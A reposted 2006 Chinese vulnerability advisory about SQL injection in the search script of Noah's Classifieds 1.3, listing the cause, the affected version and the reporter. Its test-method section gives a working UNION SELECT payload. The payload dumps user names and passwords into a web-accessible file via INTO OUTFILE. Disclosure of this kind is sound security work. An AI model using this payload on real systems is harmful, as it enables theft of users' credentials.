[转载]Noah's Classifieds搜索页SQL注入漏洞

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

发布时间：2006-2-23 15:00:33
文章作者：ADLab
文章来源：启明星辰

BUGTRAQ ID: 16773
CNCAN ID:CNCAN-2006022306

漏洞消息时间:2006-02-22

漏洞起因
输入验证错误

影响系统
PhpOutsourcing Noah's Classifieds 1.3

危害
远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。

攻击所需条件
攻击者必须访问Noah`s classifieds。

漏洞信息
Noah`s classifieds是一款基于PHP的分类管理程序。
Noah`s classifieds不正确过滤用户提交的URI输入，远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。
问题是搜索脚本对用户提交的搜索参数缺少过滤，提交恶意SQL查询作为参数数据，可更原来的SQL逻辑，获得敏感信息。

测试方法
kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#

厂商解决方案
目前没有解决方案提供,请关注以下链接:
http://classifieds.phpoutsourcing.com/

漏洞提供者
alireza hassani

漏洞消息链接
http://marc.theaimsgroup.com/?l= ... 63619730687&w=2

漏洞消息标题
[KAPDA::#29]Noah's classifieds multiple vulnerabilities